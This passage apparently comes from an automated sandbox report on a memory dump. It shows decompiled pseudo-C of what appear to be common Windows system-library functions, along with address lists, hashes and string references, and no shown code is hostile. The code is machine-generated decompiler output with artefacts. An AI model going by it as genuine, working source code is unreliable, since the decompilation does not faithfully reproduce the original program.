										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00B26AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00A8E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00A8EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00AB9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00A8E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00A88F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00AB3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00a8d5f2
0x00a8d5f5
0x00a8d5f5
0x00a8d5fd
0x00a8d600
0x00a8d60a
0x00a8d60d
0x00a8d617
0x00a8d61d
0x00a8d627
0x00a8d62e
0x00a8d911
0x00a8d913
0x00000000
0x00a8d919
0x00a8d919
0x00a8d919
0x00a8d634
0x00a8d634
0x00a8d634
0x00a8d634
0x00a8d640
0x00a8d8bf
0x00000000
0x00a8d646
0x00a8d646
0x00a8d64d
0x00a8d652
0x00adb2fc
0x00adb2fc
0x00adb302
0x00adb33b
0x00adb341
0x00000000
0x00adb304
0x00adb304
0x00adb319
0x00adb31e
0x00adb324
0x00adb326
0x00adb332
0x00adb347
0x00adb34c
0x00adb351
0x00adb35a
0x00000000
0x00adb328
0x00adb328
0x00000000
0x00adb328
0x00adb326
0x00a8d658
0x00a8d658
0x00a8d65b
0x00a8d665
0x00000000
0x00a8d66b
0x00a8d66b
0x00a8d66b
0x00a8d66b
0x00a8d66d
0x00a8d672
0x00a8d67a
0x00000000
0x00000000
0x00a8d680
0x00a8d686
0x00a8d8ce
0x00a8d8d4
0x00a8d8dd
0x00a8d8e0
0x00a8d68c
0x00a8d691
0x00a8d69d
0x00a8d6a2
0x00a8d6a7
0x00a8d6b0
0x00a8d6b5
0x00a8d6e0
0x00a8d6b7
0x00a8d6b7
0x00a8d6b9
0x00a8d6b9
0x00a8d6bb
0x00a8d6bd
0x00a8d6ce
0x00a8d6d0
0x00a8d6d2
0x00adb363
0x00adb365
0x00000000
0x00adb36b
0x00000000
0x00adb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8d6bf
0x00a8d6bf
0x00a8d6e5
0x00a8d6e7
0x00a8d6e9
0x00a8d6ec
0x00a8d6ec
0x00a8d6ef
0x00a8d6f5
0x00a8d6f9
0x00a8d6fb
0x00a8d6fd
0x00a8d701
0x00a8d703
0x00a8d70a
0x00a8d70a
0x00a8d701
0x00a8d710
0x00a8d710
0x00a8d6c1
0x00a8d6c1
0x00a8d6c6
0x00adb36d
0x00adb36f
0x00000000
0x00adb375
0x00adb375
0x00adb375
0x00000000
0x00adb375
0x00000000
0x00a8d6cc
0x00a8d6d8
0x00a8d6d8
0x00a8d6d8
0x00000000
0x00a8d6c6
0x00a8d6bf
0x00000000
0x00a8d6da
0x00a8d6da
0x00a8d716
0x00a8d71b
0x00a8d720
0x00a8d726
0x00a8d726
0x00a8d72d
0x00000000
0x00a8d733
0x00a8d739
0x00a8d742
0x00a8d750
0x00a8d758
0x00a8d764
0x00a8d776
0x00a8d77a
0x00a8d783
0x00a8d928
0x00a8d92c
0x00a8d93d
0x00a8d944
0x00a8d94f
0x00a8d954
0x00a8d956
0x00a8d95f
0x00a8d961
0x00a8d973
0x00a8d973
0x00a8d956
0x00a8d944
0x00a8d92c
0x00a8d78b
0x00adb394
0x00a8d791
0x00a8d798
0x00adb3a3
0x00adb3bb
0x00adb3bb
0x00a8d7a5
0x00a8d866
0x00a8d870
0x00a8d892
0x00a8d898
0x00a8d89e
0x00a8d8a0
0x00a8d8a6
0x00a8d8ac
0x00a8d8ae
0x00a8d8b4
0x00a8d8b4
0x00a8d8ae
0x00a8d7a5
0x00a8d78b
0x00a8d7b1
0x00adb3c5
0x00adb3c5
0x00a8d7c3
0x00a8d7ca
0x00a8d7e5
0x00a8d7eb
0x00a8d8eb
0x00a8d8ed
0x00000000
0x00a8d8f3
0x00a8d8f3
0x00a8d8f3
0x00000000
0x00a8d8ed
0x00a8d7cc
0x00a8d7cc
0x00a8d7d2
0x00000000
0x00a8d7d4
0x00a8d7d4
0x00a8d7d7
0x00a8d7df
0x00adb3d4
0x00adb3d9
0x00adb3dc
0x00adb3dc
0x00adb3df
0x00adb3e2
0x00adb468
0x00adb46d
0x00adb46f
0x00adb46f
0x00adb475
0x00a8d8f8
0x00a8d8f9
0x00a8d8fd
0x00adb3e8
0x00adb3e8
0x00adb3eb
0x00adb3ed
0x00000000
0x00adb3ef
0x00adb3ef
0x00adb3f1
0x00adb3f4
0x00adb3fe
0x00adb404
0x00adb409
0x00adb40e
0x00adb410
0x00adb410
0x00adb414
0x00adb414
0x00adb41b
0x00adb420
0x00adb423
0x00adb425
0x00adb427
0x00adb42a
0x00adb42d
0x00adb42d
0x00adb42a
0x00adb432
0x00adb436
0x00adb438
0x00adb43b
0x00adb43b
0x00adb449
0x00adb44e
0x00adb454
0x00adb458
0x00adb458
0x00adb45d
0x00000000
0x00adb45d
0x00adb3ed
0x00000000
0x00000000
0x00000000
0x00a8d7df
0x00a8d7d2
0x00a8d7ca
0x00adb37c
0x00adb37e
0x00adb385
0x00adb38a
0x00000000
0x00adb38a
0x00a8d742
0x00a8d7f1
0x00a8d7f8
0x00adb49b
0x00adb49b
0x00a8d800
0x00a8d837
0x00a8d843
0x00a8d845
0x00a8d847
0x00a8d84a
0x00a8d84b
0x00a8d84e
0x00a8d857
0x00a8d818
0x00a8d824
0x00a8d831
0x00adb4a5
0x00adb4ab
0x00adb4b3
0x00adb4b8
0x00adb4bb
0x00000000
0x00adb4c1
0x00adb4c1
0x00adb4c8
0x00000000
0x00adb4ce
0x00adb4d4
0x00adb4e1
0x00adb4e3
0x00adb4e5
0x00000000
0x00adb4eb
0x00adb4f0
0x00adb4f2
0x00a8dac9
0x00a8dacc
0x00a8dacf
0x00a8dad1
0x00a8dd78
0x00a8dd78
0x00a8dcf2
0x00000000
0x00a8dad7
0x00a8dad9
0x00a8dadb
0x00000000
0x00000000
0x00a8dae1
0x00a8dae1
0x00a8dae4
0x00a8dae6
0x00adb4f9
0x00adb4f9
0x00adb500
0x00a8daec
0x00a8daec
0x00a8daf5
0x00a8daf8
0x00a8dafb
0x00a8db03
0x00a8db11
0x00a8db16
0x00a8db19
0x00a8db1b
0x00adb52c
0x00adb531
0x00adb534
0x00a8db21
0x00a8db21
0x00a8db24
0x00a8dcd9
0x00a8dce2
0x00a8dce5
0x00a8dd6a
0x00a8dd6d
0x00000000
0x00a8dd73
0x00adb51a
0x00adb51c
0x00adb51f
0x00adb524
0x00000000
0x00adb524
0x00a8dce7
0x00a8dce7
0x00a8dce7
0x00000000
0x00a8dce7
0x00000000
0x00a8db2a
0x00a8db2c
0x00a8db31
0x00a8db33
0x00a8db36
0x00a8db39
0x00a8db3b
0x00a8db66
0x00a8db66
0x00a8db3d
0x00a8db3d
0x00a8db3e
0x00a8db46
0x00a8db47
0x00a8db49
0x00a8db4c
0x00a8db53
0x00a8db55
0x00a8db58
0x00a8db5a
0x00adb50a
0x00adb50f
0x00adb512
0x00a8db60
0x00a8db60
0x00a8db63
0x00a8db63
0x00000000
0x00a8db63
0x00a8db5a
0x00a8db3b
0x00a8db24
0x00a8db69
0x00a8db69
0x00a8db6c
0x00a8db6f
0x00a8db74
0x00adb557
0x00adb557
0x00adb55e
0x00a8db7a
0x00a8db7c
0x00a8db7f
0x00a8db82
0x00a8db85
0x00000000
0x00a8db8b
0x00a8db8b
0x00a8db8d
0x00a8db9b
0x00a8db9b
0x00a8db9d
0x00a8dba0
0x00a8dba2
0x00a8dba4
0x00a8dba7
0x00a8dba9
0x00a8dbae
0x00a8dbae
0x00a8dbb1
0x00a8dbb4
0x00a8dbb4
0x00a8dbb7
0x00a8dbba
0x00a8dcd2
0x00a8dcd4
0x00000000
0x00a8dbc0
0x00a8dbc0
0x00a8dbd2
0x00a8dbd7
0x00a8dbda
0x00a8dbdd
0x00a8dbdf
0x00000000
0x00a8dbe5
0x00a8dbe5
0x00a8dbee
0x00a8dbf1
0x00adb541
0x00adb544
0x00000000
0x00adb546
0x00adb546
0x00000000
0x00adb546
0x00a8dbf7
0x00a8dbf7
0x00a8dbfd
0x00a8dbfd
0x00a8dbff
0x00a8dc0b
0x00a8dc15
0x00a8dc1b
0x00a8dc1d
0x00a8dc21
0x00a8dc21
0x00a8dc23
0x00a8dc23
0x00a8dc26
0x00a8dc29
0x00a8dc2b
0x00000000
0x00000000
0x00a8dc31
0x00a8dc34
0x00a8dc36
0x00a8dcbf
0x00a8dcbf
0x00a8dcc2
0x00000000
0x00a8dc3c
0x00a8dc41
0x00a8dc43
0x00000000
0x00a8dc45
0x00a8dc45
0x00a8dc47
0x00000000
0x00a8dc4d
0x00a8dc4d
0x00a8dc50
0x00a8dc52
0x00a8dc55
0x00a8dcfa
0x00a8dcfe
0x00a8dd08
0x00a8dd0a
0x00a8dd0c
0x00000000
0x00a8dd12
0x00a8dd15
0x00a8dd2d
0x00a8dd2f
0x00a8dd32
0x00a8dd35
0x00000000
0x00a8dd35
0x00a8dc5b
0x00a8dc5b
0x00a8dc5e
0x00a8dc61
0x00a8dc64
0x00a8dc67
0x00a8dc67
0x00a8dc6a
0x00a8dc6c
0x00a8dc8e
0x00a8dc8e
0x00a8dc91
0x00a8dc93
0x00a8dcce
0x00a8dcce
0x00a8dc95
0x00a8dc9c
0x00a8dc6e
0x00a8dc72
0x00a8dc75
0x00a8dc77
0x00a8dc79
0x00adb551
0x00adb551
0x00000000
0x00a8dc7f
0x00a8dc7f
0x00a8dc81
0x00000000
0x00a8dc83
0x00a8dc86
0x00a8dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8dc88
0x00a8dc81
0x00a8dc79
0x00a8dc6c
0x00a8dc55
0x00a8dc47
0x00a8dc43
0x00000000
0x00a8dc36
0x00a8dc23
0x00000000
0x00a8dbff
0x00a8dbf1
0x00a8dbdf
0x00a8db8f
0x00a8db92
0x00a8db95
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8db95
0x00a8db8d
0x00a8db85
0x00a8db74
0x00a8dc9f
0x00a8dca2
0x00a8dcb0
0x00a8dcb0
0x00a8dad1
0x00adb4e5
0x00adb4c8
0x00000000
0x00000000
0x00000000
0x00a8d831
0x00000000
0x00a8d800
0x00adb47f
0x00adb485
0x00000000
0x00adb485
0x00a8d665
0x00a8d652
0x00000000

Strings

8*{, xrefs: 00A8D8CE
(/{, xrefs: 00A8D69D

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: (/{$8*{
API String ID: 0-3025282661
Opcode ID: 74614b3f65fc73c083a386ee8280620a700cd7396a6c49a29d19db6f5ec1723e
Instruction ID: e35fd38495bf9f8f13b23de5f71a2ae90b4f1f88a0ccccdc12eb4cf1e6557c95
Opcode Fuzzy Hash: 74614b3f65fc73c083a386ee8280620a700cd7396a6c49a29d19db6f5ec1723e
Instruction Fuzzy Hash: 10E1D470A01359CFDB24EF28C990BA9B7B2BF45314F1501AAE90AAB3D1DB749D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B3E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B3E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00B3BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00B3BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00B3AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00AB9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00B3A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00B3A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00AB9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00B3A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00B3A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00A92280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00A8B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00A8FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00A97D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00B2FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00b3e547
0x00b3e549
0x00b3e54f
0x00b3e553
0x00b3e557
0x00b3e55a
0x00b3e55c
0x00b3e55f
0x00b3e561
0x00b3e567
0x00b3e56b
0x00b3e7e2
0x00000000
0x00b3e571
0x00b3e575
0x00b3e577
0x00b3e57b
0x00b3e57c
0x00b3e57d
0x00b3e57e
0x00b3e57f
0x00b3e588
0x00b3e58f
0x00b3e591
0x00b3e592
0x00b3e592
0x00b3e596
0x00b3e59e
0x00b3e5a0
0x00b3e5a6
0x00b3e61d
0x00b3e61d
0x00b3e621
0x00b3e623
0x00b3e630
0x00b3e630
0x00b3e7e6
0x00b3e7eb
0x00b3e7ed
0x00b3e7f4
0x00b3e7fa
0x00b3e7ff
0x00b3e7ff
0x00b3e80a
0x00b3e812
0x00b3e812
0x00b3e5ab
0x00b3e5b4
0x00b3e5b9
0x00b3e5be
0x00b3e5c0
0x00b3e5c2
0x00b3e5c8
0x00b3e5c9
0x00b3e5cb
0x00b3e5cc
0x00b3e5d5
0x00b3e5e4
0x00b3e5f1
0x00b3e5f8
0x00b3e5f8
0x00b3e5d5
0x00b3e602
0x00b3e616
0x00b3e63d
0x00b3e644
0x00b3e64d
0x00b3e652
0x00b3e657
0x00b3e659
0x00b3e65b
0x00b3e661
0x00b3e662
0x00b3e664
0x00b3e665
0x00b3e66e
0x00b3e67d
0x00b3e68a
0x00b3e691
0x00b3e691
0x00b3e66e
0x00b3e6b0
0x00000000
0x00b3e6b6
0x00b3e6bd
0x00b3e6c7
0x00b3e6d7
0x00b3e6d9
0x00b3e6db
0x00b3e6de
0x00b3e6e3
0x00b3e6f3
0x00b3e6fc
0x00b3e700
0x00b3e700
0x00b3e704
0x00b3e70a
0x00b3e70a
0x00b3e713
0x00b3e716
0x00b3e719
0x00b3e720
0x00b3e761
0x00b3e76b
0x00b3e774
0x00b3e77a
0x00b3e77a
0x00b3e78a
0x00b3e791
0x00b3e799
0x00b3e79b
0x00b3e79f
0x00b3e7aa
0x00b3e7c0
0x00b3e7ac
0x00b3e7b2
0x00b3e7b9
0x00b3e7b9
0x00b3e7c7
0x00b3e806
0x00000000
0x00b3e7c9
0x00b3e7d1
0x00b3e7d8
0x00000000
0x00b3e7d8
0x00000000
0x00000000
0x00b3e722
0x00b3e72e
0x00b3e748
0x00b3e74c
0x00b3e754
0x00b3e756
0x00b3e75c
0x00b3e75c
0x00000000
0x00b3e75c
0x00b3e758
0x00b3e758
0x00000000
0x00b3e758
0x00b3e750
0x00000000
0x00000000
0x00b3e752
0x00000000
0x00b3e752
0x00b3e730
0x00b3e735
0x00b3e73d
0x00b3e73f
0x00000000
0x00000000
0x00b3e741
0x00b3e741
0x00000000
0x00b3e741
0x00b3e739
0x00000000
0x00000000
0x00b3e73b
0x00000000
0x00b3e73b
0x00b3e722
0x00b3e720
0x00b3e6b0
0x00b3e618
0x00000000
0x00b3e618

Strings

`, xrefs: 00B3E670
`, xrefs: 00B3E5D7

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 953b7d5128a032f8107681d34f990989d93186761efe019f1fdc69b94783ed1d
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 7A918C31204341ABEB24CE25C941B6BB7E5EF84714F24896EF9A9CA2C1E774E804CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AF51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

UEFI, xrefs: 00AF521D
Legacy, xrefs: 00AF5226

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 9d53a83000fe2e4d61b4992bfefd6e1e5604a866367fad7fe725b86b58594e08
Instruction ID: 7f8f559878b413b755b9bd333e35de3930438c7b4ab91a4772110681f671c4f4
Opcode Fuzzy Hash: 9d53a83000fe2e4d61b4992bfefd6e1e5604a866367fad7fe725b86b58594e08
Instruction Fuzzy Hash: 5E514CB1E00A189FDB24DFA8C990ABDB7F8BF48740F14412DF749EB252D6719900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 00AD48AD

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 78bb51fd6433fcc3491595d86ae2646b0ce4c214b8e6f110f71fdd47187a7e51
Instruction ID: 1358603e22c4cbcbdfeb2bb453a89f73bd1c49275e93f4bdbf199337783a4a67
Opcode Fuzzy Hash: 78bb51fd6433fcc3491595d86ae2646b0ce4c214b8e6f110f71fdd47187a7e51
Instruction Fuzzy Hash: 8151E471D102598FDF30CF68C955BAEBBB0BF08710F2581AEE85AAB382D7714D419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9B9A5

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 3e339cb08fb2dee9e96fd648f7ad76209ca4eabfefaad02b2eb5a3f58c41a798
Instruction ID: beb5e81d863989b52668c0bf5bb192bb2b47fd9015e023588d9190639d936713
Opcode Fuzzy Hash: 3e339cb08fb2dee9e96fd648f7ad76209ca4eabfefaad02b2eb5a3f58c41a798
Instruction Fuzzy Hash: E9513A71628340CFCB20CF29D68092ABBF5BB88750F24896EF58597755DB70EC44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AA2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 00AA2642, 00AA2691

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: bd54558cccdc554906c0b848b77df3597bc90a47f327bf4de4bf78589dcaac0c
Instruction ID: f17fb4cd0af33b23f103676e609cba643c1565042f30116a6ee9fff4a8117789
Opcode Fuzzy Hash: bd54558cccdc554906c0b848b77df3597bc90a47f327bf4de4bf78589dcaac0c
Instruction Fuzzy Hash: BEC170B1E00219DFCB25DFADD981BAEB7F5FF49700F584029E801AB291DB74A951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AAFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

